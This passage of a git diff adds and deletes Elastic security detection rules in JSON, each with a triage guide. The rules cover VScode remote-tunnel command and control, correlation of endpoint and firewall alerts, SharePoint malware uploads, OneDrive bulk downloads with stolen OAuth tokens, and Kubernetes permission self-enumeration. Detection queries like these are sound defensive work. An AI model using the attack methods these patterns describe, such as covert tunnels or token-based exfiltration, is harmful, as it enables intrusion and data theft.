"https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 6 - }, - "id": "083383af-b9a4-42b7-a463-29c40efe7797_6", - "type": "security-rule" -} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/0b96dfd8-5b8c-4485-9a1c-69ff7839786a_110.json b/packages/security_detection_engine/kibana/security_rule/0b96dfd8-5b8c-4485-9a1c-69ff7839786a_110.json new file mode 100644 index 00000000000..62eb3773a1d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0b96dfd8-5b8c-4485-9a1c-69ff7839786a_110.json 
@@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the execution of the VScode portable binary with the tunnel command line option indicating an attempt to establish a remote tunnel session to Github or a remote VScode instance.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Establish VScode Remote Tunnel", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Attempt to Establish VScode Remote Tunnel\n\nVisual Studio Code (VScode) offers a remote tunnel feature enabling developers to connect to remote environments seamlessly. While beneficial for legitimate remote development, adversaries can exploit this to establish unauthorized access or control over systems. 
The detection rule identifies suspicious use of VScode's tunnel command, focusing on specific command-line arguments and process behaviors, to flag potential misuse indicative of command and control activities.\n\n### Possible investigation steps\n\n- Review the process details to confirm the presence of the \"tunnel\" argument in the command line, which indicates an attempt to establish a remote tunnel session.\n- Check the parent process name to ensure it is not \"Code.exe\" when the process name is \"code-tunnel.exe\" with the \"status\" argument, as this is an exception in the rule.\n- Investigate the origin of the process by examining the user account and machine from which the process was initiated to determine if it aligns with expected usage patterns.\n- Analyze network logs to identify any unusual or unauthorized connections to GitHub or remote VScode instances that may suggest malicious activity.\n- Correlate the event with other security alerts or logs from data sources like Elastic Endgame, Sysmon, or Microsoft Defender for Endpoint to gather additional context on the activity.\n- Assess the risk and impact by determining if the system or user account has been involved in previous suspicious activities or if there are any indicators of compromise.\n\n### False positive analysis\n\n- Legitimate remote development activities using VScode's tunnel feature may trigger the rule. Users can create exceptions for known developer machines or specific user accounts frequently using this feature for authorized purposes.\n- Automated scripts or deployment tools that utilize VScode's remote tunnel for legitimate operations might be flagged. Consider excluding these processes by identifying their unique command-line arguments or parent processes.\n- Scheduled tasks or system maintenance activities that involve VScode's remote capabilities could be misidentified as threats. 
Review and whitelist these tasks by their specific execution times or associated service accounts.\n- Development environments that frequently update or test VScode extensions might inadvertently match the rule's criteria. Exclude these environments by setting up exceptions based on their network segments or IP addresses.\n- Training or demonstration sessions using VScode's remote features for educational purposes can be mistaken for suspicious activity. Implement exclusions for these sessions by tagging them with specific event identifiers or user roles.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or data exfiltration.\n- Terminate any suspicious VScode processes identified by the detection rule to halt potential command and control activities.\n- Conduct a thorough review of system logs and process histories to identify any additional indicators of compromise or lateral movement attempts.\n- Reset credentials and access tokens associated with the affected system and any connected services to mitigate unauthorized access.\n- Restore the system from a known good backup if any unauthorized changes or malware are detected.\n- Implement network segmentation to limit the ability of similar threats to spread across the environment.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : \"tunnel\" and\n (process.args : \"--accept-server-license-terms\" or\n process.name : \"code*.exe\" or\n ?process.code_signature.subject_name : \"Microsoft Corporation\" or\n process.executable : (\"?:\\\\ProgramData\\\\*\", \"?:\\\\Users\\\\Public\\\\*\", \"?:\\\\windows\\\\debug\\\\*\", \n \"\\\\Device\\\\HarddiskVolume*\\\\Users\\\\Public\\\\*\", 
\"\\\\Device\\\\HarddiskVolume*\\\\ProgramData\\\\*\", \"\\\\Device\\\\HarddiskVolume*\\\\windows\\\\debug\\\\*\")) and\n not (process.name == \"code-tunnel.exe\" and process.args == \"status\" and process.parent.name == \"Code.exe\")\n", + "references": [ + "https://badoption.eu/blog/2023/01/31/code_c2.html", + "https://code.visualstudio.com/docs/remote/tunnels" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0b96dfd8-5b8c-4485-9a1c-69ff7839786a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + 
"technique": [ + { + "id": "T1219", + "name": "Remote Access Tools", + "reference": "https://attack.mitre.org/techniques/T1219/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "0b96dfd8-5b8c-4485-9a1c-69ff7839786a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe_3.json b/packages/security_detection_engine/kibana/security_rule/0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe_3.json deleted file mode 100644 index ce683bee62e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe_3.json +++ /dev/null 
@@ -1,126 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule correlate any Elastic Defend alert with a set of suspicious events from Network security devices like Palo Alto Networks (PANW) and Fortinet Fortigate by host.ip and source.ip. This may indicate that this host is compromised and triggering multi-datasource alerts.", - "from": "now-60m", - "interval": "10m", - "language": "esql", - "license": "Elastic License v2", - "name": "Elastic Defend and Network Security Alerts Correlation", - "note": "## Triage and analysis\n\n### Investigating Elastic Defend and Network Security Alerts Correlation\n\nThis rule correlate any Elastic Defend alert with suspicious events from Network Security datasources like Palo Alto Networks (PANW), Fortinet Fortigate and Suricata by host.ip and source.ip.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific host and users involved.\n- Investiguate the network alerts by destination.ip and message.\n- Examine the timeline of the alerts to understand the sequence of events and determine if there is a pattern or progression in the tactics used.\n- Correlate the alert data with other logs and telemetry from the host, such as process creation, network connections, and file modifications, to gather additional context.\n- Check for any indicators of compromise (IOCs) associated with the alerts, such as suspicious IP addresses, domains, or file hashes, and search for these across the network.\n- Assess the impact and scope of the potential compromise by determining if other hosts or systems have similar alerts or related activity.\n\n### False positive analysis\n\n- IP address ranges overlap where the host.ip value from the Elastic Defend alert is unrelated to the source.ip value from the Network Security alert.\n- Alerts from routine administrative tasks may trigger multiple alerts. 
Review and exclude known benign activities such as scheduled software updates or system maintenance.\n- Security tools running on the host might generate alerts across different tactics. Identify and exclude alerts from trusted security applications to reduce noise.\n- Automated scripts or batch processes can mimic adversarial behavior. Analyze and whitelist these processes if they are verified as non-threatening.\n- Frequent alerts from development or testing environments can be misleading. Consider excluding these environments from the rule or applying a different risk score.\n- User behavior anomalies, such as accessing multiple systems or applications, might trigger alerts. Implement user behavior baselines to differentiate between normal and suspicious activities.\n\n### Response and remediation\n\n- Isolate the affected host from the network immediately to prevent further lateral movement by the adversary.\n- Conduct a thorough forensic analysis of the host to identify the specific vulnerabilities exploited and gather evidence of the attack phases involved.\n- Remove any identified malicious software or unauthorized access tools from the host, ensuring all persistence mechanisms are eradicated.\n- Apply security patches and updates to the host to address any exploited vulnerabilities and prevent similar attacks.\n- Restore the host from a known good backup if necessary, ensuring that the backup is free from compromise.\n- Monitor the host and network for any signs of re-infection or further suspicious activity, using enhanced logging and alerting based on the identified attack patterns.\n- Escalate the incident to the appropriate internal or external cybersecurity teams for further investigation and potential legal action if the attack is part of a larger campaign.", - "query": "FROM logs-* metadata _id\n| WHERE\n // Elastic Defend Alerts\n (event.module == \"endpoint\" and event.dataset == \"endpoint.alerts\") or\n\n // PANW suspicious events\n 
(event.dataset == \"panw.panos\" and\n event.action in (\"virus_detected\", \"wildfire_virus_detected\", \"c2_communication\", \"spyware_detected\", \"large_upload\", \"denied\", \"exploit_detected\")) or\n\n // Fortigate suspicious events\n (event.dataset == \"fortinet_fortigate.log\" and\n (event.action in (\"outbreak-prevention\", \"infected\", \"blocked\") or message like \"backdoor*\" or message like \"Proxy*\" or message like \"anomaly*\" or message like \"P2P*\" or message like \"misc*\" or message like \"DNS.Over.HTTPS\" or message like \"Remote.Access\")) or\n\n // Suricata\n (event.dataset == \"suricata.eve\" and message in (\"Command and Control Traffic\", \"Potentially Bad Traffic\", \"A Network Trojan was detected\", \"Detection of a Network Scan\", \"Domain Observed Used for C2 Detected\", \"Malware Command and Control Activity Detected\"))\n\n// extract source.ip from PANW or Fortigate events and host.ip from Elastic Defend alert\n|eval fw_alert_source_ip = CASE(event.dataset in (\"panw.panos\", \"fortinet_fortigate.log\"), source.ip, null),\n elastic_defend_alert_host_ip = CASE(event.module == \"endpoint\" and event.dataset == \"endpoint.alerts\", host.ip, null)\n| eval Esql.source_ip = COALESCE(fw_alert_source_ip, elastic_defend_alert_host_ip)\n| where Esql.source_ip is not null\n\n// group by host_source_ip shared between FG/PANW and Elastic Defend\n| stats Esql.alerts_count = COUNT(*),\n Esql.event_module_distinct_count = COUNT_DISTINCT(event.module),\n Esql.message_values_distinct_count = COUNT_DISTINCT(message),\n Esql.event_module_values = VALUES(event.module),\n Esql.message_values = VALUES(message),\n Esql.event_action_values = VALUES(event.action),\n Esql.process_executable_values = VALUES(process.executable),\n Esql.process_hash_sha256_values = VALUES(process.hash.sha256),\n Esql.process_cmdline_values = VALUES(process.command_line),\n Esql.file_path_values = VALUES(file.path),\n Esql.file_hash_sha256_values = VALUES(file.hash.sha256),\n 
Esql.host_id_values = VALUES(host.id),\n Esql.user_name_values = VALUES(user.name),\n Esql.destination_ip_values = VALUES(destination.ip)\n by Esql.source_ip\n| where Esql.event_module_distinct_count >= 2 AND Esql.message_values_distinct_count >= 2\n| eval concat_module_values = MV_CONCAT(Esql.event_module_values, \",\")\n// Make sure an endpoint alert is present along one of the network ones\n| where concat_module_values like \"*endpoint*\"\n| keep Esql.*\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "panw", - "version": "^5.0.0" - }, - { - "package": "fortinet_fortigate", - "version": "^1.0.0" - }, - { - "package": "suricata", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.alerts_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.destination_ip_values", - "type": "ip" - }, - { - "ecs": false, - "name": "Esql.event_action_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.event_module_distinct_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.event_module_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.file_hash_sha256_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.file_path_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.host_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.message_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.message_values_distinct_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.process_cmdline_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.process_executable_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.process_hash_sha256_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.source_ip", - "type": "ip" - }, - { - "ecs": false, - "name": "Esql.user_name_values", - "type": "keyword" - } - ], - 
"risk_score": 73, - "rule_id": "0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe", - "severity": "high", - "tags": [ - "Use Case: Threat Detection", - "Rule Type: Higher-Order Rule", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Fortinet", - "Data Source: PAN-OS" - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 3 - }, - "id": "0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0d160033-fab7-4e72-85a3-3a9d80c8bff7_4.json b/packages/security_detection_engine/kibana/security_rule/0d160033-fab7-4e72-85a3-3a9d80c8bff7_4.json deleted file mode 100644 index 3fed6796c9b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0d160033-fab7-4e72-85a3-3a9d80c8bff7_4.json +++ /dev/null 
@@ -1,63 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule uses alert data to determine when multiple different alerts involving the same user are triggered. Analysts can use this to prioritize triage and response, as these users are more likely to be compromised.", - "false_positives": [ - "False positives can occur with Generic built-in accounts, such as Administrator, admin, etc. if they are widespread used in your environment. As a best practice, they shouldn't be used in day-to-day tasks, as it prevents the ability to quickly identify and contact the account owner to find out if an alert is a planned activity, regular business activity, or an upcoming incident." - ], - "from": "now-24h", - "index": [ - ".alerts-security.*" - ], - "interval": "1h", - "language": "kuery", - "license": "Elastic License v2", - "name": "Multiple Alerts Involving a User", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Multiple Alerts Involving a User\n\nIn security environments, monitoring user activity is crucial as adversaries often exploit user accounts to gain unauthorized access. Attackers may trigger multiple alerts by performing suspicious actions under a compromised user account. 
The detection rule identifies such patterns by correlating diverse alerts linked to the same user, excluding known system accounts, thus prioritizing potential threats for analysts.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific user account involved, focusing on the user.name field to gather initial context about the user.\n- Examine the timeline and sequence of the triggered alerts to understand the pattern of activity associated with the user, noting any unusual or unexpected actions.\n- Cross-reference the user activity with known legitimate activities or scheduled tasks to rule out false positives, ensuring that the actions are not part of normal operations.\n- Investigate the source and destination IP addresses associated with the alerts to identify any suspicious or unauthorized access points.\n- Check for any recent changes in user permissions or group memberships that could indicate privilege escalation attempts.\n- Look into any recent login attempts or authentication failures for the user account to detect potential brute force or credential stuffing attacks.\n- Collaborate with the user or their manager to verify if the activities were authorized or if the account might be compromised.\n\n### False positive analysis\n\n- Alerts triggered by automated system processes or scripts that mimic user behavior can be false positives. To manage these, identify and exclude known benign scripts or processes from the rule.\n- Frequent alerts from users in roles that inherently require access to multiple systems or sensitive data, such as IT administrators, may not indicate compromise. Implement role-based exceptions to reduce noise.\n- Alerts generated by legitimate software updates or maintenance activities can be mistaken for suspicious behavior. 
Schedule these activities during known maintenance windows and exclude them from the rule during these times.\n- Users involved in testing or development environments may trigger multiple alerts due to their work nature. Create exceptions for these environments to prevent unnecessary alerts.\n- High-volume users, such as those in customer support or sales, may naturally generate more alerts. Monitor these users separately and adjust the rule to focus on unusual patterns rather than volume alone.\n\n### Response and remediation\n\n- Isolate the affected user account immediately to prevent further unauthorized access. Disable the account or change the password to stop any ongoing malicious activity.\n- Conduct a thorough review of the affected user's recent activities and access logs to identify any unauthorized actions or data access. This will help in understanding the scope of the compromise.\n- Remove any malicious software or unauthorized tools that may have been installed on the user's system. Use endpoint detection and response (EDR) tools to scan and clean the system.\n- Restore any altered or deleted data from backups, ensuring that the restored data is free from any malicious modifications.\n- Notify relevant stakeholders, including IT security teams and management, about the incident and the steps being taken to address it. This ensures that everyone is aware and can provide support if needed.\n- Implement additional monitoring on the affected user account and related systems to detect any further suspicious activities. This includes setting up alerts for unusual login attempts or data access patterns.\n- Review and update access controls and permissions for the affected user and similar accounts to prevent future incidents. 
Ensure that least privilege principles are applied.", - "query": "signal.rule.name:* and user.name:* and not user.id:(\"S-1-5-18\" or \"S-1-5-19\" or \"S-1-5-20\")\n", - "required_fields": [ - { - "ecs": false, - "name": "signal.rule.name", - "type": "unknown" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "0d160033-fab7-4e72-85a3-3a9d80c8bff7", - "severity": "high", - "tags": [ - "Use Case: Threat Detection", - "Rule Type: Higher-Order Rule", - "Resources: Investigation Guide" - ], - "threshold": { - "cardinality": [ - { - "field": "signal.rule.rule_id", - "value": 5 - } - ], - "field": [ - "user.name" - ], - "value": 1 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 4 - }, - "id": "0d160033-fab7-4e72-85a3-3a9d80c8bff7_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_209.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_209.json deleted file mode 100644 index 9cb770cb244..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_209.json +++ /dev/null 
@@ -1,84 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment.", - "false_positives": [ - "Benign files can trigger signatures in the built-in virus protection" - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "SharePoint Malware File Upload", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating SharePoint Malware File Upload\n\nSharePoint, a collaborative platform, facilitates file sharing and storage within organizations. Adversaries exploit this by uploading malware, leveraging the platform's sharing capabilities to propagate threats laterally. 
The detection rule identifies when SharePoint's file scanning engine flags an upload as malicious, focusing on specific audit events to alert security teams of potential lateral movement threats.\n\n### Possible investigation steps\n\n- Review the specific event details in the alert, focusing on the event.dataset, event.provider, event.code, and event.action fields to confirm the alert is related to a SharePoint file upload flagged as malware.\n- Identify the user account associated with the file upload by examining the audit logs and determine if the account has a history of suspicious activity or if it has been compromised.\n- Analyze the file metadata, including the file name, type, and size, to gather more context about the nature of the uploaded file and assess its potential impact.\n- Check the file's sharing permissions and access history to identify other users or systems that may have interacted with the file, assessing the risk of lateral movement.\n- Investigate the source of the file upload, such as the originating IP address or device, to determine if it aligns with known malicious activity or if it is an anomaly for the user.\n- Coordinate with the IT team to isolate affected systems or accounts if necessary, and initiate a response plan to mitigate any potential spread of the malware within the organization.\n\n### False positive analysis\n\n- Legitimate software updates or patches uploaded to SharePoint may be flagged as malware. To handle this, create exceptions for known update files by verifying their source and hash.\n- Internal security tools or scripts used for testing purposes might trigger false positives. Maintain a list of these tools and exclude them from alerts after confirming their legitimacy.\n- Files with encrypted content, such as password-protected documents, can be mistakenly identified as malicious. 
Implement a process to review and whitelist these files if they are from trusted sources.\n- Large batch uploads from trusted departments, like IT or HR, may occasionally be flagged. Establish a review protocol for these uploads and whitelist them if they are verified as safe.\n- Files with macros or executable content used in legitimate business processes might be detected. Work with relevant departments to identify and exclude these files from alerts after thorough validation.\n\n### Response and remediation\n\n- Immediately isolate the affected SharePoint site or library to prevent further access and sharing of the malicious file. This can be done by restricting permissions or temporarily disabling access to the site.\n- Notify the security operations team and relevant stakeholders about the detected malware to ensure awareness and initiate a coordinated response.\n- Quarantine the identified malicious file to prevent it from being accessed or executed by users. Use SharePoint's built-in capabilities or integrated security tools to move the file to a secure location.\n- Conduct a thorough scan of the affected SharePoint site and connected systems to identify any additional malicious files or indicators of compromise. 
Use advanced threat detection tools to ensure comprehensive coverage.\n- Review and revoke any unauthorized access or sharing permissions that may have been granted to the malicious file, ensuring that only legitimate users have access to sensitive data.\n- Escalate the incident to the incident response team if there are signs of lateral movement or if the malware has spread to other parts of the network, following the organization's escalation protocols.\n- Implement enhanced monitoring and logging for SharePoint and related services to detect any future attempts to upload or share malicious files, leveraging the specific query fields used in the detection rule.", - "query": "event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", - "references": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "0e52157a-8e96-4a95-a6e3-5faae5081a74", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Tactic: Lateral Movement", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1080", - "name": "Taint Shared Content", - "reference": 
"https://attack.mitre.org/techniques/T1080/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 209 - }, - "id": "0e52157a-8e96-4a95-a6e3-5faae5081a74_209", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_4.json b/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_4.json deleted file mode 100644 index 9ea64e1df40..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_4.json +++ /dev/null 
@@ -1,72 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an excessive number of files are downloaded from OneDrive using OAuth authentication. Adversaries may conduct phishing campaigns to steal OAuth tokens and impersonate users. These access tokens can then be used to download files from OneDrive.", - "false_positives": [ - "Legitimate users may download files from OneDrive using OAuth authentication. Ensure that the downloads are authorized and the user is known before taking action." - ], - "from": "now-9m", - "interval": "8m", - "language": "esql", - "license": "Elastic License v2", - "name": "M365 OneDrive Excessive File Downloads with OAuth Token", - "note": "## Triage and Analysis\n\n### Investigating M365 OneDrive Excessive File Downloads with OAuth Token\n\nThis rule detects an excessive number of files downloaded from OneDrive using OAuth authentication. Threat actors may use OAuth phishing attacks, such as **Device Code Authentication phishing**, to obtain valid access tokens and perform unauthorized data exfiltration. This method allows adversaries to bypass traditional authentication mechanisms, making it a stealthy and effective technique.\n\nThis rule leverages ESQL aggregations which limit the field values available in the alert document. To investigate further, it is recommended to identify the original documents ingested.\n\n#### Possible Investigation Steps\n\n- Review the `o365.audit.UserId` field to identify the user who performed the downloads. Check if this user typically downloads large amounts of data from OneDrive.\n- Correlate `o365.audit.UserId` with Entra Sign-In logs to verify the authentication method used and determine if it was expected for this user.\n- Review the authentication method used. If OAuth authentication was used, investigate whether it was expected for this user.\n- Identify the client application used for authentication. 
Determine if it is a legitimate enterprise-approved app or an unauthorized third-party application.\n- Check the number of unique files downloaded. If a user downloads a high volume of unique files in a short period, it may indicate data exfiltration.\n- Analyze the file types and directories accessed to determine if sensitive or confidential data was involved.\n- Investigate the source IP address and geolocation of the download activity. If it originates from an unusual or anonymized location, further scrutiny is needed.\n- Review other recent activities from the same user, such as file access, sharing, or permission changes, that may indicate further compromise.\n- Check for signs of session persistence using OAuth. If Azure sign-in logs are correlated where `authentication_protocol` or `originalTransferMethod` field shows `deviceCode`, the session was established through device code authentication.\n- Look for multiple authentication attempts from different devices or locations within a short timeframe, which could indicate unauthorized access.\n- Investigate if other OAuth-related anomalies exist, such as consent grants for unfamiliar applications or unexpected refresh token activity.\n- Review the `file.directory` value from the original documents to identify the specific folders or paths where the files were downloaded.\n\n### False Positive Analysis\n\n- Verify if the user regularly downloads large batches of files as part of their job function.\n- Determine if the downloads were triggered by an authorized automated process, such as a data backup or synchronization tool.\n- Confirm if the detected OAuth application is approved for enterprise use and aligns with expected usage patterns.\n\n### Response and Remediation\n\n- If unauthorized activity is confirmed, revoke the OAuth token used and terminate active OneDrive sessions.\n- Reset the affected user's password and require reauthentication to prevent continued unauthorized access.\n- Restrict OAuth app 
permissions and enforce conditional access policies to limit authentication to trusted devices and applications.\n- Monitor for additional signs of compromise, such as unusual email forwarding rules, external sharing of OneDrive files, or privilege escalation attempts.\n- Educate users on OAuth phishing risks and encourage the use of **Microsoft Defender for Office 365 Safe Links** to mitigate credential-based attacks.\n- Enable continuous monitoring for OAuth authentication anomalies using **Microsoft Entra ID sign-in logs** and security tools.\n", - "query": "from logs-o365.audit-*\n| where\n @timestamp > now() - 14d and\n event.dataset == \"o365.audit\" and\n event.provider == \"OneDrive\" and\n event.action == \"FileDownloaded\" and\n o365.audit.AuthenticationType == \"OAuth\" and\n event.outcome == \"success\"\n| eval\n Esql.time_window_date_trunc = date_trunc(1 minutes, @timestamp)\n| keep\n Esql.time_window_date_trunc,\n o365.audit.UserId,\n file.name,\n source.ip\n| stats\n Esql.file_name_count_distinct = count_distinct(file.name),\n Esql.event_count = count(*)\n by\n Esql.time_window_date_trunc,\n o365.audit.UserId,\n source.ip\n| where\n Esql.file_name_count_distinct >= 25\n", - "references": [ - "https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "risk_score": 47, - "rule_id": "0e524fa6-eed3-11ef-82b4-f661ea17fbce", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: SharePoint", - "Data Source: OneDrive", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Exfiltration", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1530", 
- "name": "Data from Cloud Storage", - "reference": "https://attack.mitre.org/techniques/T1530/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0010", - "name": "Exfiltration", - "reference": "https://attack.mitre.org/tactics/TA0010/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 4 - }, - "id": "0e524fa6-eed3-11ef-82b4-f661ea17fbce_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_206.json b/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_206.json deleted file mode 100644 index 86a7d4d2665..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_206.json +++ /dev/null 
@@ -1,93 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects when a service account or node attempts to enumerate their own permissions via the selfsubjectaccessreview or selfsubjectrulesreview APIs. This is highly unusual behavior for non-human identities like service accounts and nodes. An adversary may have gained access to credentials/tokens and this could be an attempt to determine what privileges they have to facilitate further movement or execution within the cluster.", - "false_positives": [ - "An administrator may submit this request as an \"impersonatedUser\" to determine what privileges a particular service account has been granted. However, an adversary may utilize the same technique as a means to determine the privileges of another token other than that of the compromised account." - ], - "index": [ - "logs-kubernetes.*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Kubernetes Suspicious Self-Subject Review", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Kubernetes Suspicious Self-Subject Review\n\nKubernetes uses APIs like selfsubjectaccessreview and selfsubjectrulesreview to allow entities to check their own permissions. While useful for debugging, adversaries can exploit these APIs to assess their access level after compromising service accounts or nodes. 
